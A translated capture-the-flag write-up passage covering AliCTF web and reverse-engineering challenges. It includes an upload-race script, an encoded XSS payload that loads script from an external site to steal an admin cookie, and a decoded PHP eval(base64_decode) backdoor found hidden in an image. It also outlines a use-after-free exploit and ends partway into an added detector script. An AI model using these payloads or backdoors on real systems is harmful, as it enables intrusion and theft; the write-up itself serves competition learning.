?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Decoding it gives the flag.</span> </p> <hr> <h5 id="toc_8">WebA-400</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper has just learned a bit of hacking and wants a site to practice on. He found a page that looks very odd; can you help him investigate? <br /></span> <span class="md_line"> hint: take a look at what is in the directory.<br /></span> <span class="md_line"> Not only the directory: for more information, also take a look at GitHub.<br /></span> <span class="md_line"> Think about the problem the x64 way.<br /></span> <span class="md_line"> http://web400a.alictf.com/f3f4d762e85fa426dd926629bff7788b.php </span> </p> </blockquote> <p class="md_block"> <span class="md_line">Capturing the page request shows an upload form:</span> </p> <pre><code>&lt;form action="http://web400a.alictf.com/f3f4d762e85fa426dd926629bff7788b.php" method="post"enctype="multipart/form-data"&gt;
&lt;label for="file"&gt;hi&lt;/label&gt;&lt;br /&gt;
&lt;input type="file" name="file" id="file"&gt;
&lt;input type="submit" name="submit" value="Submit"&gt;
&lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Uploading an arbitrary file, the page asks whether the file exists and gives its address, named after the current timestamp (year, month, day, hour, minute, second), e.g. 20140921154012.php. A manual request naturally returns 404. I guessed the file was deleted right after upload, and a script that kept polling confirmed it.</span> </p> <p class="md_block"> <span class="md_line">So use Burp Intruder to keep sending uploads while a script watches for the response:</span> </p> <pre><code>#!/usr/bin/python
import time
import requests

while 1:
    url = "http://web400a.alictf.com/upload/upload/"
    now = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
    url = url + str(now) + ".php"
    res = requests.get(url)
    print res.status_code
    if res.status_code == 200:
        print res.text
    time.sleep(0.3)</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">This retrieved the challenge page's source:</span> </p> <p class="md_block"> 
<span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-01.png" alt="img" title="" ></span> </p> <pre><code>&lt;? php
header("Location:http://security.alibaba.com");
if($_FILES["file"]["error"] &gt; 0){
    echo "Error: " . $_FILES["file"]["error"] . "&lt;br&gt;";
}else{
    $name = date('YmdHis');
    $uploaddir = '/home/wwwroot/default/upload/upload/';
    $uploadfile = $uploaddir . $name . '.php';
    if(move_uploaded_file($_FILES["file"]["tmp_name"], $uploadfile)){
        echo "upload/upload/". $name . ".php file Exist?";
    }else{
        echo "";
    }
    sleep(3);
    # unlink($uploadfile);
}
?&gt;
&lt;!-- @author:nidongde --&gt;
&lt;form action="f3f4d762e85fa426dd926629bff7788b.php" method="post"enctype="multipart/form-data"&gt;
&lt;label for="file"&gt;hi&lt;/label&gt;&lt;br /&gt;
&lt;input type="file" name="file" id="file"&gt;
&lt;input type="submit" name="submit" value="Submit"&gt;
&lt;/form&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">An LNMP stack. Reading php.ini showed many functions disabled, but being able to list directories and read files is enough: files are read with readfile, and directories listed with</span> </p> <pre><code>&lt;?php
$dir = opendir('./../');
while (($file = readdir($dir)) !== false){
    echo $file.'&lt;br /&gt;';
}
closedir($dir);
?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">In the parent upload directory I found other players' shells as well as the lalala.py script that keeps deleting files. Connecting to a shell, I downloaded an archive from the web root; judging by its timestamp, it was not something another player had left behind.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The archive needed a password to extract; after a few failed guesses I set it aside. The next day the hint mentioned directories and GitHub; the web400b log happened to contain many directories, and cross-checking them led to this odd account:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-400-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">I thought it was the key, but submitting it failed; then I remembered the archive password. Extracting gave an index.php source and a .DS_Store (the challenge author's archiver must be misconfigured... I suggest BetterZip ;)</span> </p> <pre><code>&lt;?php
foreach($_REQUEST as $key =&gt; 
$value){
    if(eregi('^(_COOKIE|GLOBALS|_GET)', $key) || strlen($key) &lt;= 0){
        exit('error');
    }else{
        foreach(Array('_GET', '_POST', '_COOKIE') as $_REQUEST){
            var_dump($key);
            foreach($$_REQUEST as $key =&gt; $value){
                var_dump($value);
                $value['alibaba']['security'] = (int)$value['alibaba']['security'];
                echo $value['alibaba']['security'];
                echo $key;
                if($key == '_POST' &amp;&amp; ~$value['alibaba']['security'] == -2347230984235 &amp;&amp; strlen($value['alibaba']['security']) &gt;= 0){
                    find_flag($value['alibaba']['security']);
                }else{
                    exit('error');
                }
            }
        }
    }
}
function find_flag(){
    $key = 'FLAG';
    echo $key;
}
?&gt;
&lt;html&gt;
&lt;body&gt;
&lt;!-- http://web400b.alictf.com/alibaba_CTF_security/--&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">First, it is clearly reached through a POST request. I added the following debugging output,</span> </p> <pre><code>foreach(Array('_GET', '_POST', '_COOKIE') as $_REQUEST){
    var_dump($key);
    foreach($$_REQUEST as $key =&gt; $value){
        var_dump($value);</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">and found that with the POST parameter _POST[alibaba][security]=xxx the value is assigned correctly and satisfies $key == &#39;_POST&#39; &amp;&amp; strlen($value[&#39;alibaba&#39;][&#39;security&#39;]) &gt;= 0.</span> </p> <p class="md_block"> <span class="md_line">Next, the check ~$value[&#39;alibaba&#39;][&#39;security&#39;] == -2347230984235 has to pass.</span> </p> <p class="md_block"> <span class="md_line">An int on a 32-bit machine only ranges over -2116126678~2147483647, so there must be a bypass. My idea was that during the == comparison, with different types on the two sides, the float on the right is converted to int and compared with the int on the left, which might get through. Just as I was about to test it, a message in the group said the server had been switched to 64-bit, so I quickly solved it...</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compi
led " src="/img/alictf-weba-400-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Afterwards I tried my earlier idea anyway; it still did not pass. Waiting for the official writeup.</span> </p> <hr> <h5 id="toc_9">WebA-500</h5> <blockquote> <p class="md_block"> <span class="md_line"> I love you cross-site scripters <br /></span> <span class="md_line"> http://web500a.alictf.com/e936a8a8ff906c8f057ed84bf4332585.php </span> </p> 
</blockquote> <pre><code>Function("‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‍‍‌‌‍‍‌‍‍‍‌‌‍‍‌‍‌‍‌‌‌‌‍‍‍‍‌‍‍‌‌‌‌‍‌‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‍‍‌‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‌‍‌‍‍‌‌‌‌‍‌‍‍‌‍‌‌‍‌‍‍‌‌‍‍‍‌‍‍‌‍‍‌‌‍‍‍‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‌‌‌‍‌‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‍‍‍‍‍‌‌‌‍‌‍‍‍‌‍‌‌‌‌‍‍‌‍‌‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‍‌‍‌‌‌‍‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‌‍‌‌‌‍‌‍‍‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‍‍‌‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‍‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‍‌‌".replace(/.{8}/g,function(u){return String.fromCharCode(parseInt(u.replace(/\u200c/g,1).replace(/\u200d/g,0),2))}))();

String.prototype.remove = function(start, length) {
    var l = this.slice(0, start);
    var r = this.slice(start+length);
    return l+r;
}

function xescape(input) {
    rawinput = input;
    input = input.replace(/&lt;([a-zA-Z])/g, '&lt;_$1');
    input = input.toUpperCase();
    input = input.remove(2,1);
    if(rawinput.length != input.length){input = "";}
    return "&lt;h1&gt;"+input+"&lt;h1&gt;";
}

document.write(xescape(''));
&lt;br&gt;请使用chrome做测试,flag在管理员的cookie中&lt;br&gt;
&lt;br&gt;example:php?code=xxxxx&lt;br&gt;
&lt;a href="4a924593e74f6b64d205fe248cefad33.php"&gt;url提交&lt;/a&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">First, bypass</span> </p> 
<pre><code>Function("xxxxx‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‍‍‌‌‍‍‌‍‍‍‌‌‍‍‌‍‌‍‌‌‌‌‍‍‍‍‌‍‍‌‌‌‌‍‌‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‍‍‌‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‌‌‍‍‍‌‍‍‌‌‍‍‍‍‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‌‍‌‍‍‌‌‌‌‍‌‍‍‌‍‌‌‍‌‍‍‌‌‍‍‍‌‍‍‌‍‍‌‌‍‍‍‌‍‍‌‌‍‍‍‌‍‌‍‍‍‍‌‌‍‌‌‍‍‍‌‌‍‌‌‌‌‍‌‌‍‍‍‌‌‍‌‌‍‍‍‍‌‍‌‌‌‍‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‍‌‍‍‌‌‍‍‌‍‌‍‌‌‍‍‌‌‍‍‍‌‌‌‌‍‌‍‍‌‍‍‍‌‍‍‌‌‍‌‍‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‌‍‍‍‌‌‌‍‍‍‍‍‍‌‌‌‍‌‍‍‍‌‍‌‌‌‌‍‍‌‍‌‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‌‌‌‍‍‌‍‌‌‌‍‍‌‌‍‍‍‍‌‍‌‌‍‌‌‍‍‍‌‌‍‌‍‍‌‍‌‌‍‍‍‌‌‍‌‌‌‍‌‍‍‍‌‌‍‍‌‌‍‍‍‌‍‌‌‌‍‍‌‌‍‍‍‌‌‍‌‌‍‌‌‌‌‍‌‌‍‌‌‍‌‍‍‌‍‌‌‌‌‍‍‌‍‍‍‌‍‍‍‌‍‌‍‍‌‍‍‌‌‌‍‌‌".replace(/.{8}/g,function(u){return String.fromCharCode(parseInt(u.replace(/\u200c/g,1).replace(/\u200d/g,0),2))}))();</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">so that the page does not redirect. The xxxxx here cannot be reproduced, because the earlier content was not saved (it came out garbled :( ).</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-weba-500-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The function checks whether the URL ends with helloalibaba; adding #helloalibaba to location.hash avoids the redirect.</span> </p> <p class="md_block"> <span class="md_line">The xescape function was modified by the organizers: an input like a&lt;img first becomes a&lt;_img, then remove(2,1) deletes the underscore, so the length is unchanged; the upper-casing step is bypassed with HTML entity encoding.</span> </p> <p class="md_block"> <span class="md_line">payload:</span> </p> <pre><code>http://web500a.alictf.com/e936a8a8ff906c8f057ed84bf4332585.php?code=a&lt;\img src=1 onerror=&amp;#101&amp;#118&amp;#97&amp;#108&amp;#40&amp;#39\\144\\157\\143\\165\\155\\145\\156\\164\\56\\167\\162\\151\\164\\145\\50\\47xxxx和谐xxxx\\75\\150\\164\\164\\160\\72\\57\\57\\170\\163\\163\\141\\156xxxx和谐xxxx\\163\\143\\162\\151\\160\\164\\76\\47\\51&amp;#39)&gt;#helloalibaba</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">URL-encode it, submit, receive the callback, and get the flag.</span> </p> <hr> <h4 id="toc_10">0x03 Reverse</h4> <h5 id="toc_11">Reverse-100</h5> 
<blockquote> <p class="md_block"> <span class="md_line">ch1.exe encrypts the information it collects and stores it in the file &quot;secret.db&quot;.<br /></span> <span class="md_line">Find the encryption key; submitting that key to the server is the flag.<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span class="md_line">ch1.exe collects host information. Debugging it in OllyDbg,<br /></span> <span class="md_line">after it gathers the local test host's information, it encrypts that information together with this string:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-100-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The encryption then happens in sub_4225e0:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-100-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">There is no need to analyze the encryption, though; the string</span> </p> <pre><code>19dlo*%AO+3i87BaweTw.lc!)61K{9^5</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">is the flag.</span> </p> <hr> <h5 id="toc_12">Reverse-200</h5> <blockquote> <p class="md_block"> <span class="md_line">Reverse Ch3.exe; clicking the button in Ch3.exe yields a key.<br /></span> <span class="md_line">The program seems to be broken; fix it and give the result.<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span class="md_line">Running Ch2.exe, the flag.crypt file in the same directory shrinks from 1 KB to 0 KB. I guessed that either the program contains a decryption routine that has to be reached by hand, or the algorithm has to be reversed.</span> </p> <p class="md_block"> <span class="md_line">No decrypt function was found, so reversing the algorithm it is. After a few runs it became clear that a flag.txt must exist in the same directory, so I renamed flag.crypt to flag.txt and reached the encrypt function.</span> </p> <p class="md_block"> <span class="md_line">Locating it in IDA Pro, some junk instructions are present:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">After replacing them all with \x90 in 010 Editor, IDA Pro shows normal code. Pressing F5 to decompile and analyzing the result shows that the sub-function sub_00401000 contains the encryption algorithm:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-02.png" 
alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The key part of the algorithm is just these lines:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-200-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Viewing flag.crypt in UltraEdit, it is 40 bytes; combined with the algorithm analysis, it is produced by expanding each of 20 bytes into its high and low nibbles.<br /></span> <span class="md_line">Reversing this gives the flag:</span> </p> <pre><code>a1dlo3i87@vt(#$^~kb25-+8=csm,%*4</code></pre> <!--block_code_end--> <hr> <h5 id="toc_13">Reverse-300</h5> <blockquote> <p class="md_block"> <span class="md_line">Reverse Ch3.exe; clicking the button in Ch3.exe yields a key.<br /></span> <span class="md_line">The program seems to be broken; fix it and give the result.<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span class="md_line">It is x64 and packed; I found UPXShell.exe online to unpack it. Searching upward from the crash point, there is this code:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Clearly the program loads DecryptDll.dll, looks up the RSADecrypt function in it, and then tries to call it.</span> </p> <p class="md_block"> <span class="md_line">But there is no DecryptDll.dll, so RSADecrypt cannot be found and the call goes wrong.</span> </p> <p class="md_block"> <span class="md_line">After searching around for a long time, I tried checking whether the DLL is embedded in the program itself and ran it through binwalk:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Extracting it and opening it in IDA, it does export RSADecrypt:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-300-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">At runtime, change R8 to point to a writable buffer; after the call the flag appears at the location R8 points to.</span> </p> <hr> <h5 id="toc_14">Reverse-400</h5> <blockquote> <p class="md_block"> <span class="md_line">Casper used the controller of a remote-access trojan to generate a trojan, trojan.exe.<br /></span> <span class="md_line"> 
But Casper noticed that the RAT controller appears to have a suspicious download interface.<br /></span> <span class="md_line"> The trojan trojan.exe can call this interface to download the controller's secret.rar.<br /></span> <span class="md_line"> Let's try to download secret.rar from the controller and see what secret it holds.<br /></span> <span class="md_line"> hint: if you find the download interface but downloading secret.rar fails, try connecting to port 88.<br /></span> <span class="md_line"> Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span class="md_line">Reverse-400 took a long time; we only got it in the last half hour.</span> </p> <p class="md_block"> <span class="md_line">At first I overthought it, trying to start from the communication protocol between controller and trojan and then analyze how each side handles different data. After a long time I still had not fully understood it...</span> </p> <p class="md_block"> <span class="md_line">In the end, out of options, a teammate suggested simply patching the case jump in sub_405D10. I had long known that path was the function handling Secret.rar, but assumed it was post-download processing and that the actual download logic came earlier. Who knew it would actually work...</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-400-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">After the patch we obtained Secret.rar.</span> </p> <p class="md_block"> <span class="md_line">The extracted content was a web challenge, so I passed it to a teammate, who happily received the file with 45 minutes to go. It turned out to be HTML containing</span> </p> <pre><code>&lt;?php include "img/aliyun.png" ?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The image has hidden content, yielding:</span> </p> <pre><code>&lt;?php
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "&lt;", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&amp;", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", "&gt;", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 0, 24, 72, 70, 28, 48, 19, 12, 0, 7, 5, 37, 0, 24, 88, 87, 0, 24, 72, 12, 28, 48, 19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 93, 18, 87, 66, 28, 18, 45, 37, 28, 48, 
19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 93, 18, 87, 40, 28, 18, 17, 5, 42, 25, 37, 91, 0, 12, 25, 87, 0, 24, 72, 91, 28, 48, 19, 49, 11, 25, 37, 91, 63, 75, 68, 87, 42, 24, 60, 87, 93, 18, 87, 5, 28, 48, 19, 66, 63, 50, 5, 49, 42, 25, 37, 91, 63, 24, 90, 87, 42, 24, 60, 87, 63, 18, 58, 87, 93, 18, 0, 37, 28, 48, 19, 66, 0, 25, 37, 91, 63, 24, 90, 87, 42, 24, 60, 87, 0, 24, 72, 91, 28, 48, 19, 40, 42, 25, 5, 70, 42, 50, 5, 70, 63, 7, 37, 91, 63, 83, 68, 87, 42, 24, 60, 87, 93, 18, 11, 66, 28, 18, 81, 7, 28, 48, 19, 7, 0, 7, 37, 91, 63, 18, 43, 87, 93, 18, 81, 70, 28, 18, 17, 37, 0, 50, 37, 91, 63, 83, 63, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 0, 24, 72, 70, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 37, 0, 18, 58, 87, 63, 24, 50, 87, 0, 24, 17, 5, 28, 48, 19, 40, 63, 7, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 18, 17, 37, 63, 58, 5, 7, 0, 25, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 48, 19, 49, 63, 58, 5, 37, 0, 18, 58, 87, 93, 18, 0, 7, 28, 48, 19, 40, 11, 7, 37, 91, 63, 66, 50, 87, 93, 18, 1, 31, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 18, 75, 49, 28, 48, 19, 12, 0, 25, 37, 91, 0, 12, 50, 87, 93, 18, 11, 37, 28, 48, 19, 7, 63, 50, 5, 70, 63, 7, 37, 91, 63, 75, 63, 87, 93, 18, 81, 70, 28, 48, 19, 40, 0, 58, 5, 70, 63, 7, 37, 91, 63, 83, 68, 87, 42, 24, 60, 87, 93, 18, 11, 66, 28, 48, 19, 66, 0, 25, 5, 91, 0, 7, 37, 91, 63, 18, 43, 87, 93, 18, 81, 70, 28, 18, 17, 37, 0, 50, 5, 70, 42, 25, 37, 91, 63, 18, 90, 87, 63, 12, 58, 87, 93, 18, 45, 66, 28, 48, 19, 40, 0, 7, 37, 91, 63, 75, 1, 87, 0, 24, 72, 70, 80, 58, 66, 3, 86, 24, 14, 19, 6, 11, 73, 73, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 
75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
$do_me="";
for($i=0;$i&lt;count($order);$i++) {$do_me=$do_me.$terms[$order[$i]];}
echo $do_me;
?&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Very familiar; for the intermediate steps see http://drops.wooyun.org/tips/2988</span> </p> <p class="md_block"> <span class="md_line">Decoding it yourself is also easy, giving:</span> </p> <pre><code>if(isset($_POST["\109\x33\110\103\x44\79\x54\x74\51\x44\79\x54\x76\109\x35\108\x7A\x6B\97\x70\x44\79\x54\97\49\x31\x41\x54\97\108\x69\98\97\x62\97\x44\65\x53\x48\x69\110\x63\x44\79\x54\99\x6F\109"])) {
    eval(base64_decode($_POST["\109\51\110\x67\x44\79\x54\116\51\x44\79\x54\x76\109\x35\x6C\x7A\x6B\97\x70\x44\79\x54\97\x31\x31\x41\x54\97\x6C\x69\x62\97\x62\97\x44\x41\83\x48\x69\110\99\x44\79\x54\x63\x6F\109"]));
}</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Quietly echoing it gave the wrong result; with trembling hands I stared at values that would not decode: how can an octal escape contain a 9?... A teammate said not to take it so seriously and just treat them as decimal ASCII... so I quietly believed him...</span> </p> <p class="md_block"> <span class="md_line">In the end the three of us got different odd versions; combining them gave the flag:</span> </p> <pre><code>m3ngD0Tt3D0Tvm5lzkapD0Ta11ATalibabaa11ATalibabaDASHncD0Tcom
m3ng.t3.vm5lzkap.a11@alibabaa11@alibaba-nc.com
m3ng.t3.vm5lzkap.a11@alIbaba-inc.com
m3ng.t3.vm5lzkap.a11@alibaba-inc.com</code></pre> <!--block_code_end--> <hr> <h5 id="toc_15">Reverse-500</h5> <blockquote> <p class="md_block"> <span class="md_line">Analyze Ch5.exe, which listens on port 55555 at reverse500.alictf.com and contains multiple vulnerabilities.<br /></span> <span class="md_line">Try to exploit them to make Ch5.exe read succ.txt from the root of the server's C: drive and submit its contents.<br /></span> <span class="md_line">Target operating system: win2008-sp2 / x32.<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote> <p class="md_block"> <span 
class="md_line">Loading it into IDA to analyze the function flow: after accept, the program spawns a thread, which first creates a 1024-byte object A, then recv's 1280 bytes of data and enters sub_401620.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">In sub_401620, the program switches on bytes 4-8 of the received data:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">When v10 is 0x2222 it calls sub_401270:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">In sub_401270, the program first copies 0x80 bytes of data to offset +4 of object A, then reads from offset +4 a number of bytes given by the received data plus 12 and sends them back to the client. And after the object is allocated,</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">the addresses of kernel32, ntdll and the object itself sit at offsets 0x84, 0x88 and 0x8c. This memory disclosure is therefore what defeats ASLR.</span> </p> <p class="md_block"> <span class="md_line">When v10 is 0x3333 it calls sub_401380:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Inside it, sub_401550 frees object A and then allocates a new block of a size specified by the received data: a use-after-free.</span> </p> <p class="md_block"> <span class="md_line">When v10 is 0x5555 it calls one of object A's virtual functions:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-re-500-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Combined with the UAF above, this yields arbitrary code execution: first use the leaked base addresses to defeat ASLR, then build a ROP chain to defeat DEP.</span> </p> <p class="md_block"> 
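</p> <p class="md_block"> <span class="md_line">Seen from the other side of the wire, the three commands just described are also the signature a defender would watch for. The following is an added example, not part of the original writeup: a small per-session detector that assumes the request layout the writeup gives (a 4-byte leading field, then the 4-byte command type at bytes 4..8, with 0x2222 for the leak handler, 0x3333 for free-and-reallocate and 0x5555 for the virtual call) and alerts only when a 0x5555 virtual call arrives after the object has been freed by 0x3333, upgrading the alert when a 0x2222 leak preceded it in the same session. The sample requests are constructed, not captured traffic.</span> </p>

```python
from collections import defaultdict

# Command types carried in bytes 4..8 of each request, as the writeup describes them.
CMD_LEAK = 0x2222     # sub_401270: copies 0x80 bytes into object A and echoes memory back
CMD_REALLOC = 0x3333  # sub_401380: frees object A, then allocates a caller-sized block
CMD_VCALL = 0x5555    # dispatches a virtual call through object A

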